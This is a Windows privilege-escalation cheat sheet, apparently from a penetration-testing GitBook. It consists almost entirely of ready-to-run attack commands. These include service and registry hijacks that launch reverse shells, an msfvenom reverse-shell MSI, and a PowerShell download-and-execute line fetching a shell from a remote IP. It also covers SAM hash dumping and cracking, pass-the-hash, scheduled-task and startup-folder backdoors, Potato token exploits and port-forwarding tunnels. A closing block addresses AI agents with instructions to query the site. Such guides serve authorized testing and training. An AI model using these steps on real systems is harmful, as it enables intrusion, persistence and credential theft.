# Windows PrivEsc METHODOLOGY: ``` https://lolbas-project.github.io/# ``` POWERSHELL: ``` #Check execution policy Get-ExecutionPolicy -List Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser #Set execution policy Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted #Execution policy bypass Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser ``` PERMISSIONS: ``` .\accesschk.exe /accepteula Seatbelt.exe icacls Seatbelt.exe ``` **SERVICE EXPLOITS** ```bash INSECURE SERVICE PERMISSIONS #Useful Permissions (SERVICE STOP, SERVICE START) #Dangerous Permissions (SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS) #Run winPEAS and check under "Service Information" #Run PowerUp and check "Checking service permissions" #Check if you can "MODIFY" any service. Confirm it from the "Modifiable Services" section below it. #Verify the permissions using "accesschk". We need to have START, STOP, SERVICE_CHANGE_CONFIG accesschk.exe /accepteula -uwcqv accesschk.exe -ucqv #Query the service configuration. Check START_TYPE(DEMAND), BINARY_PATH_NAME, DEPENDENCIES, SERVICE_START_NAME sc qc #Check current state of the service sc query #Set binary path to reverse shell payload sc config binpath= "\"C:\PrivEsc\reverse.exe\"" #OR sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" #If SERVICE_START_NAME isn't LocalSystem then run the following: sc config upnphost obj= ".\LocalSystem" password= "" #Start a listener in Kali and then start the service to get SYSTEM shell net start -------------------------------------------------------------------------------------- UNQUOTED SERVICE PATHS #Run winPEAS and check "Service Information" #Run PowerUp and check "Checking for unquoted service paths" #Check if there is a service with unquoted service path. #EXAMPLE: C:\Program Files\Unquoted Path Service\Common Files\unquoted.exe #Verify the permissions using "accesschk". We need to have START, STOP permissions accesschk.exe /accepteula -uwcqv accesschk.exe -ucqv #Check WRITE permissions on each directory in existing binary path (commands commented) accesschk.exe /accepteula -uwdq C:\ #accesschk.exe /accepteula -uwdq "C:\Program Files\" #accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\" #The current user group (mostly BUILTIN\Users) should have WRITE permissions #This means if we create a file called Common.exe, it will get executed when the service starts #Create a msfvenom reverse shell with name Common.exe and copy it to the path we have WRITE permissions to. #Start a listener and start the service to get reverse shell net start -------------------------------------------------------------------------------------- WEAK REGISTRY PERMISSIONS #Run winPEAS and check "Check if you can modify the registry of the service" #EXAMPLE: HKLM\SYSTEM\CurrentControlSet\services\regsvc ... Here regsvc = #Verify the permissions using Powershell or accesschk.exe Get-Acl HKLM\SYSTEM\CurrentControlSet\services\regsvc | Format-List accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc #If NT AUTHORITY/INTERACTIVE has ALL_ACCESS, do the next step #Check if we can START and STOP the service accesschk.exe -ucqv #View the current value in the registry entry. (ObjectName should be LocalSystem) reg query HKLM\System\CurrentControlSet\Services\regsvc #Overwrite the Image_Path with reverse shell executable. (This is similar to service bin_path) reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f #Start a listener on Kali ad then start the service net start -------------------------------------------------------------------------------------- INSECURE SERVICE EXECUTABLE #If the original service executable is modifiable by the current user then we can replace it with reverse shell #Run winPEAS and check "Service Information" #Run PowerUp and check "Checking service executable and argument permissions" #Check for "File Permissions: Everyone [AllAccess] #EXAMPLE C:\Program Files\File Permissions Service\fileperm.exe #Verify the permissions with accesschk. We need Everyone: File All Access accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\fileperm.exe" #Check if we can START and STOP the service accesschk.exe /accepteula -uvqc #Backup the original service executable copy "C:\Program Files\File Permissions Service\fileperm.exe" C:\temp\ #Overwrite the original service executable with reverse shell copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y #Start a listener on Kali and start the service net start -------------------------------------------------------------------------------------- DLL HIJACKING #Needs admin access ``` **REGISTRY EXPLOITS** ```bash AUTORUNS #Needs system restart by admin -------------------------------------------------------------------------------------- ALWAYS INSTALL ELEVATED #The exploit will only work if AlwaysInstallElevated is set to 1 for both (0x1) #Run PowerUp and check "Checking for AlwaysInstallElevated registry key" #HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer #HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated #Create a reverse shell with msfvenom msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi #Start a listener and run the .msi file to get SYSTEM shell msiexec /quiet /qn /i C:\PrivEsc\reverse.msi ``` **PASSWORDS** ```bash STORED PASSWORDS IN REGISTRY #You can even query the whole registry manually: reg query HKLM /f password /t REG_SZ /s (Search Local Machine registry) reg query HKCU /f password /t REG_SZ /s (Search Current User registry) #If the user is admin then u will get a admin shell using this: winexe -U 'admin%pass' //10.10.10.10 cmd.exe #If the user is admin then u will get a system shell using this: winexe -U 'admin%pass' --system //10.10.10.10 cmd.exe -------------------------------------------------------------------------------------- SAVED CREDS #Run winpeas and check under "Windows Credentials" #Verify this manually cmdkey /list #Use runas command to run a program in the context of the admin user runas /savecred /user:admin C:\PrivEsc\reverse.exe -------------------------------------------------------------------------------------- CONFIGURATION FILES #You can try manually querying the output: (Queries output in current directory) dir /s *pass* == *.config findstr /si password *.xml *.ini *.txt #You can check winpeas under "Looking for possible known files that contain creds. #Check if you find Unattend.xml. If found, view the contents of it to find creds. #Use winexe to login as admin user using the password found. -------------------------------------------------------------------------------------- SAM #Check if you have READ access to SAM and SYSTEM files #These files are present at C:\Windows\System32\config #Backups of these files can be found at C:\Windows\Repair or C:\Windows\System32\RegBack directory #You can check winpeas under "Looking for possible known files that contain creds. #Copy the files to Kali machine and extract the hashes (31d6 is empty hash) python pwdump.py SYSTEM SAM #Crack the password using JTR or Hashcat hashcat -m 1000 --force /usr/share/wordlists/rockyou.txt #Use winexe to login as admin user using the password cracked -------------------------------------------------------------------------------------- PASS THE HASH #Use the hash found to get an ADMIN/SYSTEM shell without the need to crack the hash pth-winexe -U 'admin%fullHash' //10.10.10.10 cmd.exe pth-winexe -U 'admin%fullHash' --system //10.10.10.10 cmd.exe ``` **SCHEDULED TASKS** ```bash #You cannot query tasks of a particular user. You need to query all the tasks #CMD schtasks /query /fo LIST /v #POWERSHELL Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State #Also check various directories if you can find a script that is running as a scheduled task #Check the permissions of the script/task using accesschk accesschk.exe /accepteula -quvw #Check the contents of the file type #Create a backup of the original file and then append the following to get reverse shell echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1 #Start a netcat listener. You will get a shell when the task is run ``` **INSECURE GUI APPS** ``` #You need RDP access and an application which is running with admin rights ``` **STARTUP APPS** ```bash #You need to simulate ADMIN LOGIN #Similar to AutoRun. Windows stores Startup applications in: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #The files in this directory are shortcuts (lnk files). #Check the permissions of that directory with icacls icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" #Check if BUILTIN\Users group has full access (F) #You can also run accesschk.exe to check for (F) accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" #Generate payloaad: msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=port -f exe -o x.exe #METHOD 1 #Transfer it to C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup #Start a netcat listener and simulate a login from admin to get a shell #METHOD 2 #Transfer the reverse shell exe to C:\Temp\reverse.exe #Create a VBScript to create a shortcut of that exe to the StartUp directory: Set oWS = WScript.CreateObject("WScript.Shell") sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk" Set oLink = oWS.CreateShortcut(sLinkFile) oLink.TargetPath = "C:\Temp\reverse.exe" oLink.Save #Transfer the VBScript to target machine #Run the script to create a shortcut: cscript CreateShortcut.vbs #Simulate an admin login to get a shell ``` **INSTALLED APPS** ```bash #If you find any 3rd party installed apps then you can use exploitBD. #For this, go to exploitDB. Then use the filter to curate the results. #Can be used to find for Linux as well #Manually enumerate the programs installed: tasklist /V #You can use Seatbelt to check for non-standard processes #You can use Winpeas and check the same under "Processes Information" ``` **HOT POTATO** ```bash #Unpatched versions on Windows 7,8 and earlier versions of Windows 10 are vulnerable to this. (Patched in 2016) #Start netcat listener and then run the following command to get a shell. .\potato.exe -ip -cmd "C:\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true ``` **TOKEN IMPERSONATION** ```bash JUICY POTATO #Check if SeImpersonatePrivilege is enabled whoami /priv #Create a bat file with following content (You can replace this with msfvenom) powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell-2.ps1') #Transfer the bat file, jp.exe to target machine #Host a Nishang shell and start a netcat listener #Run the exploit ./jp.exe -t * -p shell.bat -l 4444 #If the exploit doesn't give a shell then check the CLID in output. You can even check it on http://ohpe.it/juicy-potato/CLSID/ #Then run the following j.exe -l 4444 -p shell.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} -------------------------------------------------------------------------------------- ROGUE POTATO #Successor of JP as JP was patched in the later versions of Windows10 #You need to have a shell as a service account (LocalService) #Check if SeAssignPrimaryTokenPriviliege or SeImpersonatePrivilege is enabled #Run a socat redirector to redirect traffic to port 135 over to port 9999 on Victim machine sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.234.60:9999 #Start a netcat listener and run the RoguePotato exploit. (9999 bc we used in socat) RoguePotato.exe -r -e "C:\PrivEsc\reverse.exe" -l 9999 #You will get system shell -------------------------------------------------------------------------------------- PRINTSPOOFER #You need to have a shell as a service account (LocalService) #Check if SeAssignPrimaryTokenPriviliege or SeImpersonatePrivilege is enabled #Start a netcat listener and run the PrintSpoofer exploit PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i #You will get system shell ``` **PORT FORWARDING** ```bash #Used when we need to run an exploit on Kali but vulnerable program is listening on an internal port #We need to forward Kali Port to internal port on Windows #Can be used with winexe when 445 is listening internally PLINK #Run the following command .\plink.exe root@10.11.15.38 -R :127.0.0.1: .\plink.exe root@10.11.15.38 -R 445:127.0.0.1:445 CHISEL #Run this on Kali machine ./chisel_1.5.2_linux_amd64 server -p 444 --reverse #Run this on victim machine chisel.exe client :444 R:445:127.0.0.1:445 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://coffeetohack.gitbook.io/coffeetohack/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.